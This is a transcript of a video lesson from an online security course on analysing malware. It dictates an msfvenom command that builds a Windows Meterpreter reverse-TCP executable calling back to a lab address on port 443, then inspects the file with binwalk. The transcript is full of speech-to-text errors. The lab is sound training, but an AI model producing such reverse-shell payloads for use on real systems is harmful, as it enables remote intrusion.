Analyze and Classify Malware Lab Part 1

00:00

Hi, everyone. Welcome back to the course. So in the last video, we haven't went ahead and wrapped up our discussion on malware. So we talked about things like viruses, worms. We also talked about root kits, which will actually do in one of our labs in this course.

00:13

And we went ahead and talked about things like Ransomware, which is popular in the news as well.

00:18

In this video, we're gonna start our first lab. So both of the labs in this course we're going to be just analyzing my worst or just using different techniques to take a look at some malware. Now, I do want to forewarn you that in the next lab the root Kit lab. It is using an older root kit. But the rationale behind that is to help you understand the fundamentals. So in this video, we're gonna go ahead and

00:38

start our lab on analyzing malware, and what we're going to do is create a malicious file,

00:43

and then we're gonna go ahead and do some different methods to analyze it.

00:47

So before we get started, I want to mention that in the resource of section of the course, you can finally step by step downloadable guides these air step by step guy's toe walking through the lab. So if you find that in this video I go too fast or too slow for you, feel free to watch the video, get the holistic view of how the lab's gonna work,

01:03

and then go ahead and download the lab guide and walk through it on your own.

01:08

So let's go ahead and get started now. You should be logged into the cyber site already. If you're able to view this course,

01:15

the next thing you want to do is search in the catalogue for the analyzing classified malware lab. So we search for analyzing Classify,

01:23

that should pull it up for us and you'll see it will be this one right here.

01:26

So great. And click on that.

01:27

Next up we want to do is click the launch button

01:30

and then we'll select the launch item. But not this next screen here.

01:34

Now, it might take a minute or two to go ahead and launch the lab. I'm gonna briefly pause a video while it launches the lab.

01:41

All right, so once the lab boots all the way up, the next thing we want to do is log into our Kelly Lennox machine.

01:47

So the way we do that is we're gonna use the user name of Root in the password of tour. So it's T. O. R. And both of these are all lower case. All we have to do

01:57

is click on this other option right here. That'll give us the log in screen. We type in route,

02:04

either click log in or just press enter on your keyboard and then t o r all lower case and same thing there, and it'll pull up the Cali desktop for us.

02:14

Now I want to Kelly desktop pulls up, we want to launch a terminal. So the way we do that on this particular Callie instance as we're going to select this little black box of the top of the screen, that's gonna be the terminal.

02:23

Just go ahead and select that there.

02:25

That's gonna open the terminal window for us and give us the prompt. Now we have a pretty long command. We're going to enter in to actually create the malicious file in this lab, and so it's gonna be this command right here. So we're to be typing in

02:38

MSF venom. All lower case, a space dash. Lower case a ah, space, Lower case X. And in the numbers 86 altogether.

02:49

We're gonna put another space and then a dash in lower case platform space windows, space dash lowercase P. And then you see the rest there. So let's go ahead and just get type in that in. That will take us just a moment here.

03:01

So go ahead and type that in. So it's gonna be MSF venom

03:05

again. All over. Case

03:07

a space dash Lower case a space lower case X

03:13

86

03:14

space dash platform

03:17

space Windows,

03:20

Space dash Lower case P

03:23

space And these were gonna be all over case Windows, Ford slash

03:29

Interpreter

03:31

Ford slash reverse and then the underscore than TCP. So we're basically just creating a reverse show.

03:39

We're gonna put another space, and then these were gonna be capitalized. So l host

03:45

the equal sign and then our i p address. We gotta specify the host I p address. So 192.168

03:53

0.0 dot 100 will put another space, and then we're gonna specify the port number, so l port all caps again

04:00

the equal sign and then Https were two special fei that with 4 43 which is the port number.

04:06

All right, so next we're gonna put a space dash lowercase f

04:10

space, Lower case e X e

04:14

space

04:15

dash lower case o

04:16

space And then finally malicious file dot e x e So malicious file

04:21

Dottie FC and that's all gonna be together.

04:25

So when you type that in double, check yourself Sometimes you might put in extra dash or something like that in there. So grand double check yourself. And then once you've done that, press the enter key to go ahead and run this command to create the file. Now, it might take a couple of minutes to create this file, So just pause the video and let it create the file on your side.

04:43

All right, so you see, on my end, it's gone ahead and created the malicious file and again, years might take a few minutes, so just be patient with it, and it should create the file. Now, if it doesn't give you this saved as malicious filed out, he etc. If you don't see that if you get some air message it's probably in the syntax. So go ahead and double check the command as you've typed it. Make sure you typed everything correctly.

05:02

Now, we can also verify that this file's been created by just using the L s command. So just listing the files.

05:09

And if we go ahead to our prompt here and type in L s,

05:13

we'll see that malicious file dot e x. He does exist.

05:16

All right, So I went to always clear when I'm typing in commands in Lenox. I always like to use the clear command just to make it a little pretty. You're on my screen. You don't have to do this step If you don't want to, You we'll just go and type in clear there.

05:29

So let's go back to our step by step lab guide here.

05:31

So we wanna we've gone ahead. And here in step seven, we entered that command and we created are malicious file. We just searched for it using the list command. We noticed that, yes, it is created, and hopefully it is on your end as well. If not policy video. Make sure you're typing in things correctly and go ahead and get that file created because you will need it for the rest of the lab.

05:50

I went ahead and typed in the clear commanders to clear up my terminal to make it a little prettier on my side. You don't have to do. Step nine is not a requirement, but I have it in there just to help you make it a little clearer as your typing in commands.

06:02

If you go down here to step number 10

06:05

we're gonna go ahead and just scan this file for common signatures. Now, I do want to stress that in this lab we're doing very basic stuff here, right? So if you're out there and you're trying to grab a piece of malware off line someplace, you may not be able to analyze it these this way, you may have to get creative, but

06:25

we're gonna go through the basics here in this course and just give you the fundamental so you can build upon that.

06:30

All right, so in step 10 we're gonna type in lower case been walk

06:36

space, a dash and a Capital B

06:40

and then the name of our malicious file. So in this case, we've named it malicious file dot e x e.

06:46

All right, so that's it. And then we're gonna take a look and see if we see any signatures at all.

06:50

So we do see signatures now, signatures for malware or for software in general are not going to be the same. Excuse me. Files are not going to the same is like you. Are I signing our name on something, right? So it's not gonna look like somebody's signed name. It's gonna be Hexi decimal or something equivalent to give us that signature.

07:10

So we see here that we do have some malicious signatures found, and these are things that should be known, right? These were things Ah, we find because we're using an older type of file.

07:23

So next we're gonna go to step 11 in our step by step guide here.

07:28

So step 11 word is gonna enter in this command.

07:30

We're gonna take a look at the output that we get.

07:33

So we're just gonna type in been walk again, which is a tool that we're using to analyze this

07:39

a space dash the number three

07:42

And then again, the same file name, right? So malicious file

07:46

dot He xy

07:48

just go ahead and run that there.

07:51

It might take a moment or so to go ahead and run that command. That's just gonna give us some basic information, and it's gonna give us a visual ization of this particular file. So if you've got a side by side comparison, you could take this image here and maneuver it around and see if it looks the same as the one you're analyzing or that you've analyzed in the past.

08:11

Uh, I'm a Star Trek fan, So I see this and I say, Ooh, that's the Borg ship. But anyways, I digress.

08:16

All right, so

08:18

in this video, we've gone ahead and we've created a malicious file. We've run a couple of commands to look at it. So number one we looked at if there's any malicious signatures with the file as well as we got a visual ization of it. And once you're done visualizing this here, just go ahead and ex out of that. That'll close that and you'll be back at the terminal prompt Here.